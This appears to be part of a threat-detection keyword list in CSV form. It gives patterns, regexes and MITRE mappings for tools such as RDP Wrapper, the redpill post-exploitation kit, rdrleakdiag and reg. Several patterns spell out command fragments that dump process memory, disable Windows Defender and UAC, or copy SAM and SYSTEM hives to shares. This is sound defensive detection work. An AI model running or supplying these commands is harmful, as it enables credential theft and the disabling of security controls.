"*aaf7e238a5c0bb2a7956e2fdca9b534f227f7b737641962fb0ed965390ace4c6*",".{0,1000}aaf7e238a5c0bb2a7956e2fdca9b534f227f7b737641962fb0ed965390ace4c6.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*f9a82873a1e55bb1b5b8b8781b06799ff665464cff8ce77e07474c089123b643*",".{0,1000}f9a82873a1e55bb1b5b8b8781b06799ff665464cff8ce77e07474c089123b643.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*fed08bd733b8e60b5805007bd01a7bf0d0b1993059bbe319d1179facc6b73361*",".{0,1000}fed08bd733b8e60b5805007bd01a7bf0d0b1993059bbe319d1179facc6b73361.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*Initializing RDP Wrapper*",".{0,1000}Initializing\sRDP\sWrapper.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*'RDP Wrapper Library Installer v1.0'*",".{0,1000}\'RDP\sWrapper\sLibrary\sInstaller\sv1\.0\'.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*RDP Wrapper\RDPConf*",".{0,1000}RDP\sWrapper\\RDPConf.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*RDPWInst -w*",".{0,1000}RDPWInst\s\-w.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*rdpwrap\*\RDPWInst.*",".{0,1000}rdpwrap\\.{0,1000}\\RDPWInst\..{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*stascorp/rdpwrap*",".{0,1000}stascorp\/rdpwrap.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*rdrleakdiag.exe /p * /o * /fullmemdmp /wait 1*",".{0,1000}rdrleakdiag\.exe\s\/p\s.{0,1000}\s\/o\s.{0,1000}\s\/fullmemdmp\s\/wait\s1.{0,1000}","greyware_tool_keyword","rdrleakdiag","Microsoft Windows resource leak diagnostic tool potentially dumping lsass process","T1003","TA0006 - TA0005","N/A","N/A","Credential Access","https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*plpmggfglncceinmilojdkiijhmajkjh*",".{0,1000}plpmggfglncceinmilojdkiijhmajkjh.{0,1000}","greyware_tool_keyword","Red Panda VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* Get-AVStatus.ps1*",".{0,1000}\sGet\-AVStatus\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"* list-recycle-bin.ps1*",".{0,1000}\slist\-recycle\-bin\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"* ps2exe.ps1*",".{0,1000}\sps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*.ps1 -sysinfo Enum*",".{0,1000}\.ps1\s\-sysinfo\sEnum.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*/vbs2exe.exe*",".{0,1000}\/vbs2exe\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Get-AVStatus.ps1*",".{0,1000}\\Get\-AVStatus\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\ksjjhav.log*",".{0,1000}\\ksjjhav\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\list-recycle-bin.ps1*",".{0,1000}\\list\-recycle\-bin\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Screenshot.exe*",".{0,1000}\\Screenshot\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Screenshot.ps1*",".{0,1000}\\Screenshot\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Temp\clipboard.log*",".{0,1000}\\Temp\\clipboard\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Temp\dave.log*",".{0,1000}\\Temp\\dave\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\Temp\fsdgss.log*",".{0,1000}\\Temp\\fsdgss\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*\vbs2exe.exe*",".{0,1000}\\vbs2exe\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*BATtoEXEconverter.bat*",".{0,1000}BATtoEXEconverter\.bat.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*identify_offensive_tools.ps1*",".{0,1000}identify_offensive_tools\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*Mitre-T1202.ps1*",".{0,1000}Mitre\-T1202\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*Temp\iprange.log*",".{0,1000}Temp\\iprange\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*vbs2exe.exe *",".{0,1000}vbs2exe\.exe\s.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"* /v ""DisableAntiSpyware"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableAntiSpyware\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""DisableAntiVirus"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableAntiVirus\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""DisableIOAVProtection"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableIOAVProtection\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""DisableOnAccessProtection"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableOnAccessProtection\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""DisableRealtimeMonitoring"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableRealtimeMonitoring\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""DisableScanOnRealtimeEnable"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableScanOnRealtimeEnable\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /v ""MpEnablePus"" /t REG_DWORD /d ""0"" /f*",".{0,1000}\s\/v\s\""MpEnablePus\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*copy *sam.hive \\*",".{0,1000}copy\s.{0,1000}sam\.hive\s\\\\.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*copy *system.hive \\*",".{0,1000}copy\s.{0,1000}system\.hive\s\\\\.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System* /v EnableLUA /t REG_DWORD /d 0 /f*",".{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System.{0,1000}\s\/v\sEnableLUA\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables User Account Control","T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/nathanlopez/Stitch/blob/8e22e91c94237959c02d521aab58dc7e3d994cea/PyLib/disableUAC.py#L8","1","0","N/A","N/A","10","10","3039","657","2024-01-04T20:02:51Z","2017-01-06T02:26:01Z"
